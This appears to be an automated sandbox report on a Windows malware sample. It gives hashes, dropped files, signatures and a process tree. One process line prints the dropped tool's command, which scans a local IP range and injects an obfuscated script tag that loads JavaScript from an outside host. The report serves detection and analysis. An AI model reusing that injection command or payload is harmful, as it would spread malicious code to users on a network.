Analysis
- max time kernel: 146s
- max time network: 119s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26/12/2023, 09:03
Static task: static1
Behavioral task: behavioral1
- Sample: 6216999ae03e9bc94f4f910918a3d550.exe
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 6216999ae03e9bc94f4f910918a3d550.exe
- Resource: win10v2004-20231215-en
General
- Target: 6216999ae03e9bc94f4f910918a3d550.exe
- Size: 177KB
- MD5: 6216999ae03e9bc94f4f910918a3d550
- SHA1: ac9e37b3422fa4c6c34725e8314e04c91a185f81
- SHA256: 410aae7b289f477ef338588a1cf9f234a6a58cdfe59bb75bc6417d21e305f056
- SHA512: 87dcf16c6cef0cd60a5a8655694c472fa3b55533de167ccd29f5840c6138c9b840b03669f043a14bcf4d68ef182a7287ce3004bcdeba252853817aa427da0c69
- SSDEEP: 3072:Q1r61/kTgwCiCAeHwSocr8FrAlFs13G5hDO9HTyIFZWRk1nC0Hunbrd/AoutD:ur3bCiReQS/QrAlFsaDOFT5ZWRkBun/C
Malware Config
Signatures
- Drops file in Drivers directory (1 IoCs)
  File created: C:\Windows\SysWOW64\drivers\npf.sys (process: 6216999ae03e9bc94f4f910918a3d550.exe)
- Executes dropped EXE (1 IoCs)
  PID 2440: 360uatn.exe
- Loads dropped DLL (5 IoCs)
  PID 2440: 360uatn.exe (listed 5 times)
- Drops file in System32 directory (4 IoCs)
  File created: C:\Windows\SysWOW64\Packet.dll (process: 6216999ae03e9bc94f4f910918a3d550.exe)
  File created: C:\Windows\SysWOW64\WanPacket.dll (process: 6216999ae03e9bc94f4f910918a3d550.exe)
  File created: C:\Windows\SysWOW64\wpcap.dll (process: 6216999ae03e9bc94f4f910918a3d550.exe)
  File created: C:\Windows\SysWOW64\360uatn.exe (process: 6216999ae03e9bc94f4f910918a3d550.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings (process: 6216999ae03e9bc94f4f910918a3d550.exe)
- Runs ping.exe (1 TTPs, 1 IoCs)
  PID 1324: PING.EXE
- Suspicious use of WriteProcessMemory (9 IoCs)
  PID 1352 wrote to memory of 2440 (pid 1352, process 6216999ae03e9bc94f4f910918a3d550.exe, procid_target 99; listed 3 times)
  PID 1352 wrote to memory of 2492 (pid 1352, process 6216999ae03e9bc94f4f910918a3d550.exe, procid_target 102; listed 3 times)
  PID 2492 wrote to memory of 1324 (pid 2492, process cmd.exe, procid_target 103; listed 3 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe (PID 1352)
  Command line: "C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe"
  Signatures: Drops file in Drivers directory; Drops file in System32 directory; Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\360uatn.exe (PID 2440)
    Command line: -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%61b.P%61ss%69ngG%61s.n%65t/tj.js></script>"
    Signatures: Executes dropped EXE; Loads dropped DLL
  - C:\Windows\SysWOW64\cmd.exe (PID 2492)
    Command line: C:\Windows\system32\cmd.exe /c 12.bat
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\PING.EXE (PID 1324)
      Command line: ping 127.0.0.1 -n 5
      Signatures: Runs ping.exe
- C:\Windows\System32\rundll32.exe (PID 2224)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Downloads
- Filesize: 93KB
  MD5: 5a135b608253c6040337d3311554e477
  SHA1: aca6bfe72f762b2dc9ca3f36f2fec7aa1cea1dcc
  SHA256: 350328a72ad0cdb1c5afe54b1084586b81ce4e194e826ed27d4eb1f5f913c94c
  SHA512: 05ce32a24646134e3842df833506fac87b0ed747fef7f8c3d39b2c922535f611d1c372cb7dee5bc5c1abd238b95837bc408f2e8eaf84375d7c2a0146ac627aee
- Filesize: 1.2MB
  MD5: d39c94af221e3afd8b5a46c5beb3b778
  SHA1: aac46699e72d26a508894c4ce8a06f2cbbd10709
  SHA256: cf14ad680289728f0d87a29a074b294599bb132d562c666bab1a283974727e09
  SHA512: 8902bb9d884930e46a700b9124c72001376e3efbb7214455c525a1e4271a95b2756fbbdbc7d2f7793744b8fd2d8ddc070732e43b2ad4eef091a433bfd38077ca
- Filesize: 92KB
  MD5: 4d892fa0a54e6bfdd4f4864775c1c51b
  SHA1: a710131f8c2653c1556cfb1d078644c3f18951a7
  SHA256: 7670804e27240f191cd77b6576b187f0bee54edb393044c11c63d39ca727c8f0
  SHA512: 1c3e61875272ff3ca8132334cd4069c466e47e47a48ac3f3f98d503501a88ef457b730ee65656b367ac36c8947ce616fc337e29f07c1cf9a175448c793cdd813